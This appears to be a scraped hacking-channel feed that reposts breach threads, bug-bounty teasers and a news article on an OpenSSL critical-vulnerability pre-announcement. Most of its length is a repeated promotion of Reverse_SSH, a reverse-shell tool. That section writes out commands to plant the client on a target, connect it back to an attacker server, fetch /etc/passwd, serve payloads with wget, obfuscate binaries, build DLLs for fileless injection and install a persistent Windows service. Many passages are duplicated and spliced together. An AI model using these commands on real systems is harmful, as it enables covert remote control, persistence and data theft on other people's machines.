Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
The Secrets Behind Uber's Breach
https://external-preview.redd.it/0w4dxbLmEHcBvxSQmTPczOkw996LRvstn3zEDiXe9M8.jpg?width=640&crop=smart&auto=webp&s=12dd9b73ace95d5c3e17871a53cb8b708cf7716c submitted by /u/leafytx
[link] [comments]
➖ Sent by @TheFeedReaderBot ➖
___________________________
@hacking_Attack
@Hacking_Video
The Secrets Behind Uber's Breach
https://external-preview.redd.it/0w4dxbLmEHcBvxSQmTPczOkw996LRvstn3zEDiXe9M8.jpg?width=640&crop=smart&auto=webp&s=12dd9b73ace95d5c3e17871a53cb8b708cf7716c submitted by /u/leafytx
[link] [comments]
➖ Sent by @TheFeedReaderBot ➖
___________________________
@hacking_Attack
@Hacking_Video
reddit
The Secrets Behind Uber's Breach
Posted in r/hacking by u/leafytx • 96 points and 5 comments
How to Find Escalating HTML to SSRF. I instantly got the HOF within 5minutes.
https://medium.com/@whitehatcyber404/how-to-find-escalating-html-to-ssrf-i-instantly-got-the-hof-within-5minutes-805f173c34e4?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://medium.com/@whitehatcyber404/how-to-find-escalating-html-to-ssrf-i-instantly-got-the-hof-within-5minutes-805f173c34e4?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
How to Find Escalating HTML to SSRF. I instantly got the HOF within 5minutes.
Server Side Request Forgery through Html Injection:
Server Side Request Forgery through Html Injection:Continue reading on Medium » (https://medium.com/@whitehatcyber404/how-to-find-escalating-html-to-ssrf-i-instantly-got-the-hof-within-5minutes-805f173c34e4?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
How to Find Escalating HTML to SSRF. I instantly got the HOF within 5minutes.
Server Side Request Forgery through Html Injection:
How to Find Escalating HTML to SSRF. I instantly got the HOF within 5minutes.
Server Side Request Forgery through Html Injection:Continue reading on Medium »
Read more...
Server Side Request Forgery through Html Injection:Continue reading on Medium »
Read more...
2FA Bypass due to information disclosure & Improper access control.
Continue reading on Medium »
Read more...
Continue reading on Medium »
Read more...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
How to Become an Ethical Hacker for Beginners?
https://cdn-images-1.medium.com/max/1536/0*YFSEVTIOUBqUNd3s.png
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
How to Become an Ethical Hacker for Beginners?
https://cdn-images-1.medium.com/max/1536/0*YFSEVTIOUBqUNd3s.png
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
How to Become an Ethical Hacker for Beginners?
Many individuals are interested in hacking because of their excellent computer knowledge, but they don’t give it a try because they think it is illegal. Yes, hacking is illegal, but there is a type…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Endpoint Security Service In Singapore
https://cdn-images-1.medium.com/max/820/0*K-FORZrzMnR3crxa.jpg
Endpoint Security Service In Singapore
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Endpoint Security Service In Singapore
https://cdn-images-1.medium.com/max/820/0*K-FORZrzMnR3crxa.jpg
Endpoint Security Service In Singapore
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Endpoint Security Service In Singapore
Endpoint Security Service In Singapore
hacking: security in practice
How to identify who clicks my link?
I have this Bitly link; all I can see is how many times my link visited, at what time, and from what country.
What I would like is to know more. What's its approximate location or better? Like what browser he/she is using. Is it the same person who clicked before? Or what were his/her engagements before, did he/she visited an online store? How can I do this? I believe it is possible and it is legal since it is what google does, but how?
submitted by /u/Shnxx
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
How to identify who clicks my link?
I have this Bitly link; all I can see is how many times my link visited, at what time, and from what country.
What I would like is to know more. What's its approximate location or better? Like what browser he/she is using. Is it the same person who clicked before? Or what were his/her engagements before, did he/she visited an online store? How can I do this? I believe it is possible and it is legal since it is what google does, but how?
submitted by /u/Shnxx
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
How to identify who clicks my link?
I have this Bitly link; all I can see is how many times my link visited, at what time, and from what country. What I would like is to know more....
Hacking Articles Tips Tricks Videos Tutorials
Photo
Black Hat Ethical Hacking
OpenSSL Gives Heads Up to Critical Vulnerability Disclosure
OpenSSL Gives Heads Up to Critical Vulnerability DisclosurePost Views: 66 Premium Contenthttps://www.blackhatethicalhacking.com/wp-content/uploads/2022/09/Patreon.png Subscribe to Patreon to watch this episode.
Reading Time: 3 Minutes Developers of the OpenSSL cryptography library have taken the unusual step of pre-warning that an update due to land next Tuesday (November 1) will fix a critical vulnerability.The looming OpenSSL 3.x patch represent only the second time the project has addressed a flaw classified as ‘critical’. The only previous OpenSSL update of such elevated severity addressed the infamous Heartbleed vulnerability (CVE-2014-0160).
Heartbleed was a memory handling bug that opened the door for attackers to access secret keys, passwords, and sensitive personal information from vulnerable servers. At the time of its discovery eight years ago, experts from Netcraft estimated that the flaw affected 17% of SSL web servers or “half a million widely trusted websites”.
Little is known about the upcoming critical fix (OpenSSL 3.0.7), other than it is restricted to OpenSSL version 3.0, the latest release line of the software, and does not affect previous versions.
OpenSSL 3.0.x only debuted in 2021, a factor that might limit the extent of the problems next week’s announcement will reveal. OpenSSL has been around since 1998 and most systems today are still built using earlier release lines.
No details of the upcoming patch or the critical flaw it tackles have been released. In the absence of any hard info, infosec Twitter has gone into overdrive with some speculating that the vulnerability might represent the “next Heartbleed”.
One security expert from Google, for example, has suggested on the basis of recent software commits and a blog post by the OpenSSL team that the update might relate to a denial-of-service (DoS) issue.
See Also: So you want to be a hacker? Complete Offensive Security and Ethical Hacking Course Feel the DHEatThis particular DoS bug – known as DHEat and previous confirmed to affect OpenVPN and SSH services – involves enforcing the Diffie-Hellman key exchange.
DHEat (AKA CVE-2002-20001) scores 7.5 on the CVSS 3.1 index, indicating high severity and falling somewhat short of critical.
On the face of it, an OpenSSL patch for DHEat would appear to be a poor candidate for a critical patch unless OpenSSL is particularly vulnerable. A recent OpenSSL blog post referencing DHEat makes it even more unlikely that the looming patch tackles this issue.
It seems more likely that a previously unknown vulnerability is at play, according to experts quizzed by The Daily Swig.
Trending: Exploit XSS Injections in a one-line powerful Technique
Trending: Recon Tool: Hakrawler Action stationsBrian Fox, CTO of Sonatype, told us that organizations should audit their code base for exposure to any vulnerability in OpenSSL 3.0.x, leaving them prepared to either patch or isolate vulnerable systems next week.
“In the first instance, it’s critical to find out where 3.x is used,” Fox said. “More importantly, it’s vital to get tooling in place to avoid having to audit and identify components manually every time.”
Fox went on to argue that speculation about the content of the upcoming fix were, at best, “unhelpful”. He said: “The speculation assumes that the fix is available in the publicly visible source and the advance notice gives attackers time to find it. This assumption may not be true. It is a best practice at some times to embargo the actual change until after the announcement for this exact reason.
“The team at OpenSSL consists of some of the foremost experts in handling high profile open sou[...]
___________________________
@hacking_Attack
@Hacking_Video
OpenSSL Gives Heads Up to Critical Vulnerability Disclosure
OpenSSL Gives Heads Up to Critical Vulnerability DisclosurePost Views: 66 Premium Contenthttps://www.blackhatethicalhacking.com/wp-content/uploads/2022/09/Patreon.png Subscribe to Patreon to watch this episode.
Reading Time: 3 Minutes Developers of the OpenSSL cryptography library have taken the unusual step of pre-warning that an update due to land next Tuesday (November 1) will fix a critical vulnerability.The looming OpenSSL 3.x patch represent only the second time the project has addressed a flaw classified as ‘critical’. The only previous OpenSSL update of such elevated severity addressed the infamous Heartbleed vulnerability (CVE-2014-0160).
Heartbleed was a memory handling bug that opened the door for attackers to access secret keys, passwords, and sensitive personal information from vulnerable servers. At the time of its discovery eight years ago, experts from Netcraft estimated that the flaw affected 17% of SSL web servers or “half a million widely trusted websites”.
Little is known about the upcoming critical fix (OpenSSL 3.0.7), other than it is restricted to OpenSSL version 3.0, the latest release line of the software, and does not affect previous versions.
OpenSSL 3.0.x only debuted in 2021, a factor that might limit the extent of the problems next week’s announcement will reveal. OpenSSL has been around since 1998 and most systems today are still built using earlier release lines.
No details of the upcoming patch or the critical flaw it tackles have been released. In the absence of any hard info, infosec Twitter has gone into overdrive with some speculating that the vulnerability might represent the “next Heartbleed”.
One security expert from Google, for example, has suggested on the basis of recent software commits and a blog post by the OpenSSL team that the update might relate to a denial-of-service (DoS) issue.
See Also: So you want to be a hacker? Complete Offensive Security and Ethical Hacking Course Feel the DHEatThis particular DoS bug – known as DHEat and previous confirmed to affect OpenVPN and SSH services – involves enforcing the Diffie-Hellman key exchange.
DHEat (AKA CVE-2002-20001) scores 7.5 on the CVSS 3.1 index, indicating high severity and falling somewhat short of critical.
On the face of it, an OpenSSL patch for DHEat would appear to be a poor candidate for a critical patch unless OpenSSL is particularly vulnerable. A recent OpenSSL blog post referencing DHEat makes it even more unlikely that the looming patch tackles this issue.
It seems more likely that a previously unknown vulnerability is at play, according to experts quizzed by The Daily Swig.
Trending: Exploit XSS Injections in a one-line powerful Technique
Trending: Recon Tool: Hakrawler Action stationsBrian Fox, CTO of Sonatype, told us that organizations should audit their code base for exposure to any vulnerability in OpenSSL 3.0.x, leaving them prepared to either patch or isolate vulnerable systems next week.
“In the first instance, it’s critical to find out where 3.x is used,” Fox said. “More importantly, it’s vital to get tooling in place to avoid having to audit and identify components manually every time.”
Fox went on to argue that speculation about the content of the upcoming fix were, at best, “unhelpful”. He said: “The speculation assumes that the fix is available in the publicly visible source and the advance notice gives attackers time to find it. This assumption may not be true. It is a best practice at some times to embargo the actual change until after the announcement for this exact reason.
“The team at OpenSSL consists of some of the foremost experts in handling high profile open sou[...]
___________________________
@hacking_Attack
@Hacking_Video
Black Hat Ethical Hacking
OpenSSL Gives Heads Up to Critical Vulnerability Disclosure | Black Hat Ethical Hacking
Developers of the OpenSSL cryptography library have taken the unusual step of pre-warning that an update due to land next Tuesday (November 1) will fix a critical vulnerability.
Hacking Articles Tips Tricks Videos Tutorials
Black Hat Ethical Hacking OpenSSL Gives Heads Up to Critical Vulnerability Disclosure OpenSSL Gives Heads Up to Critical Vulnerability DisclosurePost Views: 66 Premium Contenthttps://www.blackhatethicalhacking.com/wp-content/uploads/2022/09/Patreon.png Subscribe…
rce vulnerability disclosures and if they have determined this is the best course of action – to give advance notice – then I have faith in that decision.”
Professor Alan Woodward, a computer scientist at the University of Surrey, reasoned that the problem is unlikely to be related to the older vulnerability.
“If the OpenSSL vulnerability is truly critical as per their own definition, then it sounds dire,” Prof. Woodward told The Daily Swig. “If it’s the older vulnerability, I fear they may have cried wolf. It isn’t helpful to give so little information but as it is a tiny team I can see why.”
Trending: Exploited Windows zero-day lets JavaScript files bypass security warnings Are u a security researcher? Or a company that writes articles or write ups about Cyber Security, Offensive Security (related to information security in general) that match with our specific audience and is worth sharing?
If you want to express your idea in an article contact us here for a quote: info@blackhatethicalhacking.com
Source: portswigger.net Source Link https://www.blackhatethicalhacking.com/wp-content/uploads/2022/03/Merch.png Recent News* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/10/Images-for-the-News-posts-4-1-300x150.png GitHub patches bug called repojacking that could allow access to another user’s repoOctober 28, 2022
Reading Time: 3 minutes
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/10/Images-for-the-News-posts-3-1-300x150.png Windows vulnerable driver blocklist sync issue patchedOctober 27, 2022
Reading Time: 4 minutes
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/10/Images-for-the-News-posts-2-2-300x150.png Cisco warns admins to patch AnyConnect flaw exploited in attacksOctober 26, 2022
Reading Time: 3 minutes
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/10/Images-for-the-News-posts-12-300x150.png Apple fixes new zero-day used in attacks against iPhones, iPadsOctober 25, 2022
Reading Time: 3 minutes
https://www.blackhatethicalhacking.com/wp-content/uploads/2022/06/OffSec-Course.png Offensive Security & Ethical Hacking CourseBegin the learning curve of hacking now!
The post OpenSSL Gives Heads Up to Critical Vulnerability Disclosure first appeared on Black Hat Ethical Hacking.
___________________________
@hacking_Attack
@Hacking_Video
Professor Alan Woodward, a computer scientist at the University of Surrey, reasoned that the problem is unlikely to be related to the older vulnerability.
“If the OpenSSL vulnerability is truly critical as per their own definition, then it sounds dire,” Prof. Woodward told The Daily Swig. “If it’s the older vulnerability, I fear they may have cried wolf. It isn’t helpful to give so little information but as it is a tiny team I can see why.”
Trending: Exploited Windows zero-day lets JavaScript files bypass security warnings Are u a security researcher? Or a company that writes articles or write ups about Cyber Security, Offensive Security (related to information security in general) that match with our specific audience and is worth sharing?
If you want to express your idea in an article contact us here for a quote: info@blackhatethicalhacking.com
Source: portswigger.net Source Link https://www.blackhatethicalhacking.com/wp-content/uploads/2022/03/Merch.png Recent News* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/10/Images-for-the-News-posts-4-1-300x150.png GitHub patches bug called repojacking that could allow access to another user’s repoOctober 28, 2022
Reading Time: 3 minutes
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/10/Images-for-the-News-posts-3-1-300x150.png Windows vulnerable driver blocklist sync issue patchedOctober 27, 2022
Reading Time: 4 minutes
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/10/Images-for-the-News-posts-2-2-300x150.png Cisco warns admins to patch AnyConnect flaw exploited in attacksOctober 26, 2022
Reading Time: 3 minutes
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/10/Images-for-the-News-posts-12-300x150.png Apple fixes new zero-day used in attacks against iPhones, iPadsOctober 25, 2022
Reading Time: 3 minutes
https://www.blackhatethicalhacking.com/wp-content/uploads/2022/06/OffSec-Course.png Offensive Security & Ethical Hacking CourseBegin the learning curve of hacking now!
The post OpenSSL Gives Heads Up to Critical Vulnerability Disclosure first appeared on Black Hat Ethical Hacking.
___________________________
@hacking_Attack
@Hacking_Video
Reverse_SSH - SSH Based Reverse Shell
http://www.kitploit.com/2022/10/reversessh-ssh-based-reverse-shell.html
___________________________
@hacking_Attack
@Hacking_Video
http://www.kitploit.com/2022/10/reversessh-ssh-based-reverse-shell.html
___________________________
@hacking_Attack
@Hacking_Video
Want to use SSH for reverse shells? Now you can. Manage and connect to reverse shells (https://www.kitploit.com/search/label/Reverse%20Shells) with native SSH syntax Dynamic, local and remote forwarding Native SCP and SFTP implementations for retrieving files from your targets Full windows shell Mutual client & server authentication (https://www.kitploit.com/search/label/Authentication) to create high trust control channels
And more! +----------------+ +---------+
| | | |
| | +---------+ RSSH |
| Reverse | | | Client |
| SSH server (https://www.kitploit.com/search/label/SSH%20server) | | | |
| | | +---------+
+---------+ | | |
| | | | |
| Human | SSH | | SSH | +---------+
| Client +-------->+ <-----------------+ |
| | | | | | RSSH |
+---------+ | | | | Client |
| | | | |
| | | +---------+
| | |
| | |
+----------------+ | +---------+
| | |
| | RSSH |
+---------+ Client |
| |
+---------+ TL;DR Setup Docker: docker run -p3232:2222 -e EXTERNAL_ADDRESS=:3232 -e SEED_AUTHORIZED_KEYS="$(cat ~/.ssh/id_ed25519.pub)" -v data:/data reversessh/reverse_ssh
Manual: git clone https://github.com/NHAS/reverse_ssh
cd reverse_ssh
make
cd bin/
# start the server
cp ~/.ssh/id_ed25519.pub authorized_keys
./server 0.0.0.0:3232 Running # copy client to your target then connect it to the server
./client your.rssh.server.com:3232
# Get help text
ssh your.rssh.server.com -p 3232 help
# See clients
ssh your.rssh.server.com -p 3232 ls -t
Targets
+------------------------------------------+------------+-------------+
| ID | Hostname | IP Address |
+------------------------------------------+------------+-------------+
| 0f6ffecb15d75574e5e955e014e0546f6e2851ac | root.wombo | [::1]:45150 |
+------------------------------------------+------------+-------------+
# Connect to full shell
ssh -J your.rssh.server.com:3232 0f6ffecb15d75574e5e955e014e0546f6e2851ac
# Or using hostname
ssh -J your.rssh.server.com:3232 root.wombo
Setup Instructions NOTE: reverse_ssh requires Go 1.17 or higher. Please check you have at least this version via go version The simplest build command is just: make Make will build both the client and server binaries. It will also generate a private key for the client, and copy the corresponding public key to the authorized_controllee_keys file to enable the reverse shell to connect. Golang allows your to effortlessly cross compile, the following is an example for building windows: GOOS=windows GOARCH=amd64 make client # will create client.exe You will need to create an authorized_keys file much like the ssh http://man.he.net/man5/authorized_keys, this contains your public key. This will allow you to connect to the RSSH server. Alternatively, you can use the --authorizedkeys flag to point to a file. cp ~/.ssh/id_ed25519.pub authorized_keys
___________________________
@hacking_Attack
@Hacking_Video
And more! +----------------+ +---------+
| | | |
| | +---------+ RSSH |
| Reverse | | | Client |
| SSH server (https://www.kitploit.com/search/label/SSH%20server) | | | |
| | | +---------+
+---------+ | | |
| | | | |
| Human | SSH | | SSH | +---------+
| Client +-------->+ <-----------------+ |
| | | | | | RSSH |
+---------+ | | | | Client |
| | | | |
| | | +---------+
| | |
| | |
+----------------+ | +---------+
| | |
| | RSSH |
+---------+ Client |
| |
+---------+ TL;DR Setup Docker: docker run -p3232:2222 -e EXTERNAL_ADDRESS=:3232 -e SEED_AUTHORIZED_KEYS="$(cat ~/.ssh/id_ed25519.pub)" -v data:/data reversessh/reverse_ssh
Manual: git clone https://github.com/NHAS/reverse_ssh
cd reverse_ssh
make
cd bin/
# start the server
cp ~/.ssh/id_ed25519.pub authorized_keys
./server 0.0.0.0:3232 Running # copy client to your target then connect it to the server
./client your.rssh.server.com:3232
# Get help text
ssh your.rssh.server.com -p 3232 help
# See clients
ssh your.rssh.server.com -p 3232 ls -t
Targets
+------------------------------------------+------------+-------------+
| ID | Hostname | IP Address |
+------------------------------------------+------------+-------------+
| 0f6ffecb15d75574e5e955e014e0546f6e2851ac | root.wombo | [::1]:45150 |
+------------------------------------------+------------+-------------+
# Connect to full shell
ssh -J your.rssh.server.com:3232 0f6ffecb15d75574e5e955e014e0546f6e2851ac
# Or using hostname
ssh -J your.rssh.server.com:3232 root.wombo
Setup Instructions NOTE: reverse_ssh requires Go 1.17 or higher. Please check you have at least this version via go version The simplest build command is just: make Make will build both the client and server binaries. It will also generate a private key for the client, and copy the corresponding public key to the authorized_controllee_keys file to enable the reverse shell to connect. Golang allows your to effortlessly cross compile, the following is an example for building windows: GOOS=windows GOARCH=amd64 make client # will create client.exe You will need to create an authorized_keys file much like the ssh http://man.he.net/man5/authorized_keys, this contains your public key. This will allow you to connect to the RSSH server. Alternatively, you can use the --authorizedkeys flag to point to a file. cp ~/.ssh/id_ed25519.pub authorized_keys
___________________________
@hacking_Attack
@Hacking_Video
KitPloit - PenTest & Hacking Tools
Leading source of security tools, hacking tools, cybersecurity and network security. Learn about new tools and updates in one place.
./server 0.0.0.0:3232 #Set the server to listen on port 3232 Put the client binary on whatever you want to control, then connect to the server. ./client your.rssh.server.com:3232 You can then see what reverse shells have connected to you using ls: ssh your.rssh.server.com -p 3232 ls -t
Targets
+------------------------------------------+------------+-------------+
| ID | Hostname | IP Address |
+------------------------------------------+------------+-------------+
| 0f6ffecb15d75574e5e955e014e0546f6e2851ac | root.wombo | [::1]:45150 |
+------------------------------------------+------------+-------------+
Then typical ssh commands work, just specify your rssh server as a jump host. # Connect to full shell
ssh -J your.rssh.server.com:3232 root.wombo
# Run a command without pty
ssh -J your.rssh.server.com:3232 root.wombo help
# Start remote forward
ssh -R 1234:localhost:1234 -J your.rssh.server.com:3232 root.wombo
# Start dynamic forward
ssh -D 9050 -J your.rssh.server.com:3232 root.wombo
# SCP
scp -J your.rssh.server.com:3232 root.wombo:/etc/passwd .
#SFTP
sftp -J your.rssh.server.com:3232 root.wombo:/etc/passwd .
Fancy Features Default Server Specify a default server at build time: $ RSSH_HOMESERVER=your.rssh.server.com:3232 make
# Will connect to your.rssh.server.com:3232, even though no destination is specified
$ bin/client
# Behaviour is otherwise normal; will connect to the supplied host, e.g example.com:3232
$ bin/client example.com:3232 Built in Web Server The RSSH server can also run an HTTP server on the same port as the RSSH server listener which serves client binaries. The server must be placed in the project bin/ folder, as it needs to find the client source. fingerprint will default to server public key --upx Use upx to compress the final binary (requires upx to be installed) --garble Use garble to obfuscate the binary (requires garble to be installed) # Build a client binary catcher$ link --name test http://your.rssh.server.com:3232/test " dir="auto">./server --webserver :3232
# Generate an unnamed link
ssh your.rssh.server.com -p 3232
catcher$ link -h
link [OPTIONS]
Link will compile a client and serve the resulting binary on a link which is returned.
This requires the web server component has been enabled.
-t Set number of minutes link exists for (default is one time use)
-s Set homeserver address, defaults to server --external_address if set, or server listen address if not.
-l List currently active download links
-r Remove download link
--goos Set the target build operating system (default to runtime GOOS)
--goarch Set the target build architecture (default to runtime GOARCH)
--name Set link name
--shared-object Generate shared object file
--fingerprint Set RSSH server fingerprint will default to server public key
--upx Use upx to compress the final binary (requires upx to be installed)
--garble Use ga rble to obfuscate the binary (requires garble to be installed)
# Build a client binary
catcher$ link --name test
http://your.rssh.server.com:3232/test
Then you can download it as follows: wget http://your.rssh.server.com:3232/test
chmod +x test
./test Windows DLL Generation You can compile the client as a DLL to be loaded with something like Invoke-ReflectivePEInjection (https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-ReflectivePEInjection.ps1). This will need a cross compiler if you are doing this on linux, use mingw-w64-gcc. CC=x86_64-w64-mingw32-gcc GOOS=windows RSSH_HOMESERVER=192.168.1.1:2343 make client_dll When the RSSH server has the webserver enabled you can also compile it with the link command: ./server --webserver :3232
# Generate an unnamed link
ssh your.rssh.server.com -p 3232
catcher$ link --name windows_dll --shared-object --goos windows
http://your.rssh.server.com:3232/windows_dll
___________________________
@hacking_Attack
@Hacking_Video
Targets
+------------------------------------------+------------+-------------+
| ID | Hostname | IP Address |
+------------------------------------------+------------+-------------+
| 0f6ffecb15d75574e5e955e014e0546f6e2851ac | root.wombo | [::1]:45150 |
+------------------------------------------+------------+-------------+
Then typical ssh commands work, just specify your rssh server as a jump host. # Connect to full shell
ssh -J your.rssh.server.com:3232 root.wombo
# Run a command without pty
ssh -J your.rssh.server.com:3232 root.wombo help
# Start remote forward
ssh -R 1234:localhost:1234 -J your.rssh.server.com:3232 root.wombo
# Start dynamic forward
ssh -D 9050 -J your.rssh.server.com:3232 root.wombo
# SCP
scp -J your.rssh.server.com:3232 root.wombo:/etc/passwd .
#SFTP
sftp -J your.rssh.server.com:3232 root.wombo:/etc/passwd .
Fancy Features Default Server Specify a default server at build time: $ RSSH_HOMESERVER=your.rssh.server.com:3232 make
# Will connect to your.rssh.server.com:3232, even though no destination is specified
$ bin/client
# Behaviour is otherwise normal; will connect to the supplied host, e.g example.com:3232
$ bin/client example.com:3232 Built in Web Server The RSSH server can also run an HTTP server on the same port as the RSSH server listener which serves client binaries. The server must be placed in the project bin/ folder, as it needs to find the client source. fingerprint will default to server public key --upx Use upx to compress the final binary (requires upx to be installed) --garble Use garble to obfuscate the binary (requires garble to be installed) # Build a client binary catcher$ link --name test http://your.rssh.server.com:3232/test " dir="auto">./server --webserver :3232
# Generate an unnamed link
ssh your.rssh.server.com -p 3232
catcher$ link -h
link [OPTIONS]
Link will compile a client and serve the resulting binary on a link which is returned.
This requires the web server component has been enabled.
-t Set number of minutes link exists for (default is one time use)
-s Set homeserver address, defaults to server --external_address if set, or server listen address if not.
-l List currently active download links
-r Remove download link
--goos Set the target build operating system (default to runtime GOOS)
--goarch Set the target build architecture (default to runtime GOARCH)
--name Set link name
--shared-object Generate shared object file
--fingerprint Set RSSH server fingerprint will default to server public key
--upx Use upx to compress the final binary (requires upx to be installed)
--garble Use ga rble to obfuscate the binary (requires garble to be installed)
# Build a client binary
catcher$ link --name test
http://your.rssh.server.com:3232/test
Then you can download it as follows: wget http://your.rssh.server.com:3232/test
chmod +x test
./test Windows DLL Generation You can compile the client as a DLL to be loaded with something like Invoke-ReflectivePEInjection (https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-ReflectivePEInjection.ps1). This will need a cross compiler if you are doing this on linux, use mingw-w64-gcc. CC=x86_64-w64-mingw32-gcc GOOS=windows RSSH_HOMESERVER=192.168.1.1:2343 make client_dll When the RSSH server has the webserver enabled you can also compile it with the link command: ./server --webserver :3232
# Generate an unnamed link
ssh your.rssh.server.com -p 3232
catcher$ link --name windows_dll --shared-object --goos windows
http://your.rssh.server.com:3232/windows_dll
___________________________
@hacking_Attack
@Hacking_Video
GitHub
PowerSploit/CodeExecution/Invoke-ReflectivePEInjection.ps1 at master · PowerShellMafia/PowerSploit
PowerSploit - A PowerShell Post-Exploitation Framework - PowerShellMafia/PowerSploit
Which is useful when you want to do fileless injection of the rssh client. SSH Subsystem The SSH ecosystem allowsy out define and call subsystems with the -s flag. In RSSH this is repurposed to provide special commands for platforms. All list Lists avaiable subsystem
sftp: Runs the sftp handler to transfer files Linux setgid: Attempt to change group
setuid: Attempt to change user Windows service: Installs or removes the rssh binary as a windows service, requires administrative rights e.g # Install the rssh binary as a service (windows only)
ssh -J your.rssh.server.com:3232 test-pc.user.test-pc -s service --install
Windows Service Integration The client RSSH binary supports being run within a windows service and wont time out after 10 seconds. This is great for creating persistent management (https://www.kitploit.com/search/label/Management) services. Full Windows Shell Support Most reverse shells for windows struggle to generate a shell environment that supports resizing, copying and pasting and all the other features that we're all very fond of. This project uses conpty on newer versions of windows, and the winpty library (which self unpacks) on older versions. This should mean that almost all versions of windows will net you a nice shell. Webhooks The RSSH server can send out raw HTTP requests set using the webhook command from the terminal interface. First enable a webhook: $ ssh your.rssh.server.com -p 3232
catcher$ webhook --on http://localhost:8080/ Then disconnect, or connect a client, this will when issue a POST request with the following format. $ nc -l -p 8080
POST /rssh_webhook HTTP/1.1
Host: localhost:8080
User-Agent: Go-http-client/1.1
Content-Length: 165
Content-Type: application/json
Accept-Encoding: gzip
{"Status":"connected","ID":"ae92b6535a30566cbae122ebb2a5e754dd58f0ca","IP":"[::1]:52608","HostName":"user.computer","Timestamp":"2022-06-12T12:23:40.626775318+12:00"}% Tuntap RSSH and SSH support creating tuntap interfaces that allow you to route traffic and create pseudo-VPN. It does take a bit more setup than just a local or remote forward (-L, -R), but in this mode you can send UDP and ICMP. First set up a tun (layer 3) device on your local machine. sudo ip tuntap add dev tun0 mode tun
sudo ip addr add 172.16.0.1/24 dev tun0
sudo ip link set dev tun0 up
# This will defaultly route all non-local network traffic through the tunnel
sudo ip route add 0.0.0.0/0 via 172.16.0.1 dev tun0
Install a client on a remote machine, this will not work if you have your RSSH client on the same host as your tun device. ssh -J your.rssh.server.com:3232 user.wombo -w 0:any
This has some limitations, it is only able to send UDP/TCP/ICMP, and not arbitrary layer 3 protocols. ICMP is best effort and may use the remote hosts ping tool, as ICMP sockets are privileged on most machines. This also does not support tap devices, e.g layer 2 VPN, as this would require administrative access. Help Garble To enable the --garble flag in the link command you must install garble, a system for obfuscating golang binaries. However the @latest release has a bug that causes panics with generic code.
If you are installing this manually use the following: go install mvdan.cc/garble@f9d9919 Then make sure that the go/bin/ directory is in your $PATH Permission denied (publickey). Unfortunately the golang crypto/ssh upstream library does not support rsa-sha2-* algorithms, and work is currently ongoing here: golang/go#49952 (https://github.com/golang/go/issues/49952) So until that work is completed, you will have to generate a different (non-rsa) key. I recommend the following: ssh-keygen -t ed25519
Windows and SFTP Due to the limitations of SFTP (or rather the library Im using for it). Paths need a little more effort on windows. sftp -r -J your.rssh.server.com:3232 test-pc.user.test-pc:'/C:/Windows/system32'
___________________________
@hacking_Attack
@Hacking_Video
sftp: Runs the sftp handler to transfer files Linux setgid: Attempt to change group
setuid: Attempt to change user Windows service: Installs or removes the rssh binary as a windows service, requires administrative rights e.g # Install the rssh binary as a service (windows only)
ssh -J your.rssh.server.com:3232 test-pc.user.test-pc -s service --install
Windows Service Integration The client RSSH binary supports being run within a windows service and wont time out after 10 seconds. This is great for creating persistent management (https://www.kitploit.com/search/label/Management) services. Full Windows Shell Support Most reverse shells for windows struggle to generate a shell environment that supports resizing, copying and pasting and all the other features that we're all very fond of. This project uses conpty on newer versions of windows, and the winpty library (which self unpacks) on older versions. This should mean that almost all versions of windows will net you a nice shell. Webhooks The RSSH server can send out raw HTTP requests set using the webhook command from the terminal interface. First enable a webhook: $ ssh your.rssh.server.com -p 3232
catcher$ webhook --on http://localhost:8080/ Then disconnect, or connect a client, this will when issue a POST request with the following format. $ nc -l -p 8080
POST /rssh_webhook HTTP/1.1
Host: localhost:8080
User-Agent: Go-http-client/1.1
Content-Length: 165
Content-Type: application/json
Accept-Encoding: gzip
{"Status":"connected","ID":"ae92b6535a30566cbae122ebb2a5e754dd58f0ca","IP":"[::1]:52608","HostName":"user.computer","Timestamp":"2022-06-12T12:23:40.626775318+12:00"}% Tuntap RSSH and SSH support creating tuntap interfaces that allow you to route traffic and create pseudo-VPN. It does take a bit more setup than just a local or remote forward (-L, -R), but in this mode you can send UDP and ICMP. First set up a tun (layer 3) device on your local machine. sudo ip tuntap add dev tun0 mode tun
sudo ip addr add 172.16.0.1/24 dev tun0
sudo ip link set dev tun0 up
# This will defaultly route all non-local network traffic through the tunnel
sudo ip route add 0.0.0.0/0 via 172.16.0.1 dev tun0
Install a client on a remote machine, this will not work if you have your RSSH client on the same host as your tun device. ssh -J your.rssh.server.com:3232 user.wombo -w 0:any
This has some limitations, it is only able to send UDP/TCP/ICMP, and not arbitrary layer 3 protocols. ICMP is best effort and may use the remote hosts ping tool, as ICMP sockets are privileged on most machines. This also does not support tap devices, e.g layer 2 VPN, as this would require administrative access. Help Garble To enable the --garble flag in the link command you must install garble, a system for obfuscating golang binaries. However the @latest release has a bug that causes panics with generic code.
If you are installing this manually use the following: go install mvdan.cc/garble@f9d9919 Then make sure that the go/bin/ directory is in your $PATH Permission denied (publickey). Unfortunately the golang crypto/ssh upstream library does not support rsa-sha2-* algorithms, and work is currently ongoing here: golang/go#49952 (https://github.com/golang/go/issues/49952) So until that work is completed, you will have to generate a different (non-rsa) key. I recommend the following: ssh-keygen -t ed25519
